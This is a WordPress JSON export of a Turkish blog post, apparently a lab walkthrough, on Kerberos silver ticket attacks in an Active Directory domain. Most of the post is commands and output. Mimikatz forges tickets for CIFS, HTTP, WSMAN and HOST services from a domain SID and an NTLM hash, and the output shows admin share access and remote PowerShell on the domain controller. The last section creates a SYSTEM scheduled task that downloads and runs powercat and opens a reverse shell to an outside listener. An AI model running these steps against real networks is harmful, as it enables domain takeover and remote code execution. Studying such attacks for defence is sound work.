{"id":658,"date":"2020-11-29T03:12:27","date_gmt":"2020-11-29T03:12:27","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=658"},"modified":"2020-11-29T03:12:27","modified_gmt":"2020-11-29T03:12:27","slug":"nedir-bu-silver-ticket","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2020\/11\/29\/nedir-bu-silver-ticket\/","title":{"rendered":"Nedir Bu Silver Ticket?"},"content":{"rendered":"

Bu yaz\u0131y\u0131 Pentester Academy'nin kurslar\u0131na ba\u015flad\u0131\u011f\u0131mda yazm\u0131\u015ft\u0131m. Baz\u0131 yanl\u0131\u015flar yapt\u0131\u011f\u0131m\u0131 g\u00f6rerek \u015fimdi tekrardan kaleme almaya karar verdim. Yaz\u0131 i\u00e7erisinde belirli ko\u015fullar dahilinde bir silver ticket sald\u0131r\u0131s\u0131 ger\u00e7ekle\u015ftirece\u011fiz.<\/p>\n

Ba\u011flant\u0131 kurdu\u011fumuz makina \u00fczerinde local priv yapm\u0131\u015f\u0131z ve hedef servisin ntlm hash'inin elimizde olmas\u0131 gerekmektedir. Silver ticket yapmadan \u00f6nce Kerberoast gibi sald\u0131r\u0131larla \u015fifreler elde edilebilir.<\/p>\n

Servislere g\u00f6re farkl\u0131 silver ticket ataklar\u0131 yapabiliriz. A\u015fa\u011f\u0131da baz\u0131 servis tiplerinin \u00f6rnekleri g\u00f6sterilmi\u015ftir.<\/p>\n

\n

Servis Tipi: WMI
\nService Silver Tickets: HOST, RPCSS<\/p>\n

Servis Tipi: PowerShell Remoting
\nService Silver Tickets: HOST, HTTP, WSMAN, RPCSS<\/p>\n

Servis Tipi: WinRM
\nService Silver Tickets: HOST, HTTP<\/p>\n

Servis Tipi: Scheduled Tasks
\nService Silver Tickets: HOST<\/p>\n

Servis Tipi: Windows File Share (CIFS)
\nService Silver Tickets: CIFS<\/p>\n

Servis Tipi: LDAP operations including Mimikatz DCSync
\nService Silver Tickets: LDAP<\/p>\n

Servis Tipi: Windows Remote Server Administration Tools
\nService Silver Tickets: RPCSS, LDAP, CIFS<\/p>\n<\/blockquote>\n

Yukar\u0131daki k\u0131s\u0131m\u0131 inceldiyseniz anlaman\u0131z gereken k\u0131saca \u015fudur. Silver ticker sald\u0131r\u0131s\u0131 yapt\u0131ktan sonra DC \u00fczerinde powershell remoting yapmak istiyorsan\u0131z kullanman\u0131z gerek servis HTTP'dir. HTTP servisinin kullan\u0131c\u0131s\u0131da makina oldu\u011fundan dolay\u0131 NTLM hash olarak makina hesab\u0131n\u0131n NTLM hash'ini kullanman\u0131z gerekcektir. Hedef sunucuda MSSQL Server olabilir, b\u00f6yle bir durumda da MSSQL hesab\u0131n\u0131n NTLM hash'ini kullanman\u0131z gerekektir. A\u015fa\u011f\u0131da farkl\u0131 servislerle denenmi\u015f silver ticket sald\u0131r\u0131lar\u0131n\u0131n \u00f6nrekleri yer almaktad\u0131r.<\/p>\n

Silver Ticket for Windows Share (CIFS) Admin Access<\/h2>\n

A\u015fa\u011f\u0131da g\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere sald\u0131r\u0131 \u00f6ncesi ilk olarak bir deneme i\u015flemi yap\u0131lm\u0131\u015ft\u0131r ve hata ile kar\u015f\u0131la\u015f\u0131lm\u0131\u015ft\u0131r.<\/p>\n

PS C:\\Tools\\MimikatzPowershell> ls \\\\DC-01.kuday.local\\C$\nls : Access is denied\nAt line:1 char:1\n+ ls \\\\DC-01.kuday.local\\C$\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : PermissionDenied: (\\\\DC-01.kuday.local\\C$:String) [Get-ChildItem], UnauthorizedAccessException\n    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand\n\nls : Cannot find path '\\\\DC-01.kuday.local\\C$' because it does not exist.\nAt line:1 char:1\n+ ls \\\\DC-01.kuday.local\\C$\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : ObjectNotFound: (\\\\DC-01.kuday.local\\C$:String) [Get-ChildItem], ItemNotFoundException\n    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n\nPS C:\\Tools\\MimikatzPowershell><\/code><\/pre>\n
Mimikatz ile sald\u0131r\u0131m\u0131z\u0131 yapal\u0131m.
\nNot: Domain SID'si (Get-DomainSID - Powersploit\/Recon) ve DC-01 makinesinin NTLM hashini biliyoruz.<\/p>\n
PS C:\\Tools\\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden \/sid:S-1-5-21-2945184338-1184837640-344998139 \/domain:kuday.local \/user:Administrator \/service:cifs \/rc4:35df48bccf39f0ff7e97a928b1d2dc2c \/target:DC-01.kuday.local \/ptt"'\n\n  .#####.   mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25\n .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)\n ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ##       > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com   ***\/\n\nmimikatz(powershell) # kerberos::golden \/sid:S-1-5-21-2945184338-1184837640-344998139 \/domain:kuday.local \/user:Administrator \/service:cifs \/rc4:35df48bccf39f0ff7e97a928b1d2dc2c \/target:DC-01.kuday.local \/ptt\nUser      : Administrator\nDomain    : kuday.local (KUDAY)\nSID       : S-1-5-21-2945184338-1184837640-344998139\nUser Id   : 500\nGroups Id : *513 512 520 518 519\nServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt\nService   : cifs\nTarget    : DC-01.kuday.local\nLifetime  : 11\/29\/2020 2:35:26 AM ; 11\/27\/2030 2:35:26 AM ; 11\/27\/2030 2:35:26 AM\n-> Ticket : ** Pass The Ticket **\n\n * PAC generated\n * PAC signed\n * EncTicketPart generated\n * EncTicketPart encrypted\n * KrbCred generated\n\nGolden ticket for 'Administrator @ kuday.local' successfully submitted for current session\n\nPS C:\\Tools\\MimikatzPowershell>\nPS C:\\Tools\\MimikatzPowershell>\nPS C:\\Tools\\MimikatzPowershell>\nPS C:\\Tools\\MimikatzPowershell>\nPS C:\\Tools\\MimikatzPowershell> ls \\\\DC-01.kuday.local\\C$\n\n    Directory: \\\\DC-01.kuday.local\\C$\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-----         8\/7\/2020   6:58 AM                PerfLogs\nd-r---       11\/10\/2020  12:09 AM                Program Files\nd-----        11\/9\/2020  12:40 AM                Program Files (x86)\nd-----       10\/29\/2020   2:31 AM                SQL2019\nd-r---       10\/29\/2020   5:37 PM                Users\nd-----        10\/6\/2020   9:28 PM                Windows\n-a----       10\/29\/2020   5:17 PM             23 Sonuclar.txt\n-a----       11\/22\/2020  12:29 AM           1391 ticket.kirbi\n\nPS C:\\Tools\\MimikatzPowershell><\/code><\/pre>\n
G\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere sald\u0131r\u0131 ba\u015far\u0131l\u0131!<\/p>\n
Silver Ticket to Connect to PowerShell Remoting on Windows Computer with Admin Access<\/h2>\n
\u0130lk olarak bir deneme yapal\u0131m.<\/p>\n
PS C:\\Windows\\system32> Enter-PSSession -ComputerName DC-01.kuday.local\nEnter-PSSession : Connecting to remote server DC-01.kuday.local failed with the following error message : A specified\nlogon session does not exist. It may already have been terminated. For more information, see the\nabout_Remote_Troubleshooting Help topic.\nAt line:1 char:1\n+ Enter-PSSession -ComputerName DC-01.kuday.local\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : InvalidArgument: (DC-01.kuday.local:String) [Enter-PSSession], PSRemotingTransportExcept\n   ion\n    + FullyQualifiedErrorId : CreateRemoteRunspaceFailed<\/code><\/pre>\n
Yukar\u0131da g\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere i\u015flemi ger\u00e7ekle\u015ftiremedik. \u015eimdi Powershell Remoting i\u00e7in winrm ve http servislerini kullanarak silver ticket sald\u0131r\u0131s\u0131 yapal\u0131m.<\/p>\n
PS C:\\Tools\\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden \/sid:S-1-5-21-2945184338-1184837640-344998139 \/domain:kuday.local \/user:Administrator \/service:http \/rc4:35df48bccf39f0ff7e97a928b1d2dc2c \/target:DC-01.kuday.local \/ptt"'\n\n  .#####.   mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25\n .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)\n ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ##       > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com   ***\/\n\nmimikatz(powershell) # kerberos::golden \/sid:S-1-5-21-2945184338-1184837640-344998139 \/domain:kuday.local \/user:Administrator \/service:http \/rc4:35df48bccf39f0ff7e97a928b1d2dc2c \/target:DC-01.kuday.local \/ptt\nUser      : Administrator\nDomain    : kuday.local (KUDAY)\nSID       : S-1-5-21-2945184338-1184837640-344998139\nUser Id   : 500\nGroups Id : *513 512 520 518 519\nServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt\nService   : http\nTarget    : DC-01.kuday.local\nLifetime  : 11\/29\/2020 2:39:46 AM ; 11\/27\/2030 2:39:46 AM ; 11\/27\/2030 2:39:46 AM\n-> Ticket : ** Pass The Ticket **\n\n * PAC generated\n * PAC signed\n * EncTicketPart generated\n * EncTicketPart encrypted\n * KrbCred generated\n\nGolden ticket for 'Administrator @ kuday.local' successfully submitted for current session\n\nPS C:\\Tools\\MimikatzPowershell><\/code><\/pre>\n
PS C:\\Tools\\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden \/sid:S-1-5-21-2945184338-1184837640-344998139 \/domain:kuday.local \/user:Administrator \/service:wsman \/rc4:35df48bccf39f0ff7e97a928b1d2dc2c \/target:DC-01.kuday.local \/ptt"'\n\n  .#####.   mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25\n .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)\n ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ##       > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com   ***\/\n\nmimikatz(powershell) # kerberos::golden \/sid:S-1-5-21-2945184338-1184837640-344998139 \/domain:kuday.local \/user:Administrator \/service:wsman \/rc4:35df48bccf39f0ff7e97a928b1d2dc2c \/target:DC-01.kuday.local \/ptt\nUser      : Administrator\nDomain    : kuday.local (KUDAY)\nSID       : S-1-5-21-2945184338-1184837640-344998139\nUser Id   : 500\nGroups Id : *513 512 520 518 519\nServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt\nService   : wsman\nTarget    : DC-01.kuday.local\nLifetime  : 11\/29\/2020 2:40:17 AM ; 11\/27\/2030 2:40:17 AM ; 11\/27\/2030 2:40:17 AM\n-> Ticket : ** Pass The Ticket **\n\n * PAC generated\n * PAC signed\n * EncTicketPart generated\n * EncTicketPart encrypted\n * KrbCred generated\n\nGolden ticket for 'Administrator @ kuday.local' successfully submitted for current session\n\nPS C:\\Tools\\MimikatzPowershell><\/code><\/pre>\n
Kontrollerimizi yapal\u0131m.<\/p>\n
PS C:\\Tools\\MimikatzPowershell> klist\n\nCurrent LogonId is 0:0x36705\n\nCached Tickets: (2)\n\n#0>     Client: Administrator @ kuday.local\n        Server: wsman\/DC-01.kuday.local @ kuday.local\n        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)\n        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent\n        Start Time: 11\/29\/2020 2:40:17 (local)\n        End Time:   11\/27\/2030 2:40:17 (local)\n        Renew Time: 11\/27\/2030 2:40:17 (local)\n        Session Key Type: RSADSI RC4-HMAC(NT)\n        Cache Flags: 0\n        Kdc Called:\n\n#1>     Client: Administrator @ kuday.local\n        Server: http\/DC-01.kuday.local @ kuday.local\n        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)\n        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent\n        Start Time: 11\/29\/2020 2:39:46 (local)\n        End Time:   11\/27\/2030 2:39:46 (local)\n        Renew Time: 11\/27\/2030 2:39:46 (local)\n        Session Key Type: RSADSI RC4-HMAC(NT)\n        Cache Flags: 0\n        Kdc Called:\nPS C:\\Tools\\MimikatzPowershell><\/code><\/pre>\n
Harika! Art\u0131k ba\u011flant\u0131 kurabiliriz.<\/p>\n
\nPS C:\\Tools\\MimikatzPowershell> Enter-PSSession -ComputerName DC-01.KUDAY.LOCAL\n[DC-01.KUDAY.LOCAL]: PS C:\\Users\\Administrator\\Documents> hostname\nDC-01\n[DC-01.KUDAY.LOCAL]: PS C:\\Users\\Administrator\\Documents><\/code><\/pre>\n
Silver Ticket for the Windows computer (HOST) with Admin Access<\/h2>\n
Bu son \u00f6rnek i\u00e7erisinde de zamanlanm\u0131\u015f g\u00f6rev olu\u015fturup bunun arac\u0131l\u0131\u011f\u0131 ile reverse shell almay\u0131 deneyece\u011fiz. Bunun uygulamas\u0131 di\u011ferlerine nazaran biraz daha uzun s\u00fcrecek ama bence daha zevkli. Bir kahve al\u0131n!<\/p>\n
Reverse shell alaca\u011f\u0131m\u0131z i\u00e7in bir dinleme noktas\u0131na da ihtiya\u00e7 duyuyoruz. Bunun i\u00e7in powercar'i kullanca\u011f\u0131m. Github linki buradad\u0131r.<\/a><\/p>\n
\u0130lk olarak kendi makinamda bir dinleme noktas\u0131 olu\u015fturdum.<\/p>\n
PS C:\\Tools\\powercat> Import-Module .\\powercat.ps1\nPS C:\\Tools\\powercat> powercat -l -p 443<\/code><\/pre>\n
Daha sonras\u0131da HOST servisini kullanarak bir silver ticket sald\u0131r\u0131s\u0131 ger\u00e7ekle\u015ftirdim.<\/p>\n
PS C:\\Tools\\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden \/sid:S-1-5-21-2945184338-1184837640-344998139 \/domain:kuday.local \/user:Administrator \/service:HOST \/rc4:35df48bccf39f0ff7e97a928b1d2dc2c \/target:DC-01.kuday.local \/ptt"'\n\n  .#####.   mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25\n .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)\n ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ##       > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com   ***\/\n\nmimikatz(powershell) # kerberos::golden \/sid:S-1-5-21-2945184338-1184837640-344998139 \/domain:kuday.local \/user:Administrator \/service:HOST \/rc4:35df48bccf39f0ff7e97a928b1d2dc2c \/target:DC-01.kuday.local \/ptt\nUser      : Administrator\nDomain    : kuday.local (KUDAY)\nSID       : S-1-5-21-2945184338-1184837640-344998139\nUser Id   : 500\nGroups Id : *513 512 520 518 519\nServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt\nService   : HOST\nTarget    : DC-01.kuday.local\nLifetime  : 11\/29\/2020 3:12:15 AM ; 11\/27\/2030 3:12:15 AM ; 11\/27\/2030 3:12:15 AM\n-> Ticket : ** Pass The Ticket **\n\n * PAC generated\n * PAC signed\n * EncTicketPart generated\n * EncTicketPart encrypted\n * KrbCred generated\n\nGolden ticket for 'Administrator @ kuday.local' successfully submitted for current session\n\nPS C:\\Tools\\MimikatzPowershell><\/code><\/pre>\n
\u015eimdi DC-01'daki zamanlanm\u0131\u015f g\u00f6revleri g\u00f6relim.<\/p>\n
PS C:\\Tools\\MimikatzPowershell> Get-ScheduledTask -CimSession DC-01.kuday.local\n\nTaskPath                                       TaskName                          State      PSComputerName\n--------                                       --------                          -----      --------------\n\\                                              CreateExplorerShellUnelevatedTask Ready      DC-01.kuday.local\n\\                                              STCheck                           Ready      DC-01.kuday.local\n\\                                              User_Feed_Synchronization-{EF7... Ready      DC-01.kuday.local\n\\Microsoft\\Windows\\                            Server Initial Configuration Task Disabled   DC-01.kuday.local\n\\Microsoft\\Windows\\.NET Framework\\             .NET Framework NGEN v4.0.30319    Ready      DC-01.kuday.local\n\\Microsoft\\Windows\\.NET Framework\\             .NET Framework NGEN v4.0.30319 64 Ready      DC-01.kuday.local\n\\Microsoft\\Windows\\.NET Framework\\             .NET Framework NGEN v4.0.30319... Disabled   DC-01.kuday.local\n\\Microsoft\\Windows\\.NET Framework\\             .NET Framework NGEN v4.0.30319... Disabled   DC-01.kuday.local\n\\Microsoft\\Windows\\Active Directory Rights ... AD RMS Rights Policy Template ... Disabled   DC-01.kuday.local\n\\Microsoft\\Windows\\Active Directory Rights ... AD RMS Rights Policy Template ... Ready      DC-01.kuday.local\n\\Microsoft\\Windows\\AppID\\                      EDP Policy Manager                Ready      DC-01.kuday.local\n\\Microsoft\\Windows\\AppID\\                      PolicyConverter                   Disabled   DC-01.kuday.local\n\\Microsoft\\Windows\\AppID\\                      VerifiedPublisherCertStoreCheck   Disabled   DC-01.kuday.local\n\\Microsoft\\Windows\\Application Experience\\     Microsoft Compatibility Appraiser Ready      DC-01.kuday.local\n\\Microsoft\\Windows\\Application Experience\\     ProgramDataUpdater                Ready      DC-01.kuday.local\n...\n...\n...<\/code><\/pre>\n
Normal \u015fartlar alt\u0131nda bu komutu \u00e7al\u0131\u015ft\u0131ramazd\u0131k. Silver ticket sald\u0131r\u0131s\u0131 sayesinde CimSession<\/a>'a DC-01.kuday.local dedi\u011fimizde bir hata ile kar\u015f\u0131la\u015fm\u0131yoruz. Evet \u015fimdi zamanlanm\u0131\u015f g\u00f6revimizi haz\u0131rlayal\u0131m.<\/p>\n
PS C:\\Tools\\MimikatzPowershell> schtasks.exe \/create \/S DC-01.kuday.local \/SC Weekly \/RU "NT Authority\\SYSTEM" \/TN "KUDAY4REVERSE" \/TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString('''https:\/\/raw.githubusercontent.com\/kudayDOTsite\/powercat\/master\/powercat.ps1'''); powercat -c 10.10.250.111 443 -e cmd;'"\nSUCCESS: The scheduled task "KUDAY4REVERSE" has successfully been created.\nPS C:\\Tools\\MimikatzPowershell>\nPS C:\\Tools\\MimikatzPowershell>\nPS C:\\Tools\\MimikatzPowershell> schtasks.exe \/Run \/S DC-01.kuday.local \/TN "KUDAY4REVERSE"\nSUCCESS: Attempted to run the scheduled task "KUDAY4REVERSE".\nPS C:\\Tools\\MimikatzPowershell><\/code><\/pre>\n
Dinleme noktam\u0131z\u0131 kontrol etti\u011fimizde ise:<\/p>\n
PS C:\\Tools\\powercat> powercat -l -p 443 -t 99999\nMicrosoft Windows [Version 10.0.17763.1397]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>hostname\nhostname\nDC-01\n\nC:\\Windows\\system32>whoami\nwhoami\nnt authority\\system\n\nC:\\Windows\\system32><\/code><\/pre>\n
Referanslar:
\nhttps:\/\/docs.microsoft.com\/en-us\/powershell\/module\/scheduledtasks\/start-scheduledtask?view=win10-ps<\/a>
\nhttps:\/\/docs.microsoft.com\/en-us\/powershell\/module\/scheduledtasks\/new-scheduledtask?view=win10-ps<\/a>
\nhttps:\/\/docs.microsoft.com\/en-us\/powershell\/module\/scheduledtasks\/register-scheduledtask?view=win10-ps<\/a>
\nhttps:\/\/docs.microsoft.com\/en-us\/powershell\/module\/scheduledtasks\/enable-scheduledtask?view=win10-ps<\/a>
\nhttps:\/\/adsecurity.org\/?p=2011<\/a>
\nhttps:\/\/stackoverflow.com\/questions\/20108886\/scheduled-task-with-daily-trigger-and-repetition-interval<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Bu yaz\u0131y\u0131 Pentester Academy’nin kurslar\u0131na ba\u015flad\u0131\u011f\u0131mda yazm\u0131\u015ft\u0131m. Baz\u0131 yanl\u0131\u015flar yapt\u0131\u011f\u0131m\u0131 g\u00f6rerek \u015fimdi tekrardan kaleme almaya karar verdim. Yaz\u0131 i\u00e7erisinde belirli ko\u015fullar dahilinde bir silver ticket…<\/p>\n
Devam\u0131n\u0131 okuNedir Bu Silver Ticket?<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[269,320],"tags":[435,299,396,394,436,395,397,338],"class_list":["post-658","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-powershell","tag-host","tag-http","tag-mimikatz","tag-powercat","tag-rpcss","tag-schtasks","tag-silver-ticket","tag-wsman","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/658","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=658"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/658\/revisions"}],"predecessor-version":[{"id":659,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/658\/revisions\/659"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=658"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=658"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=658"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}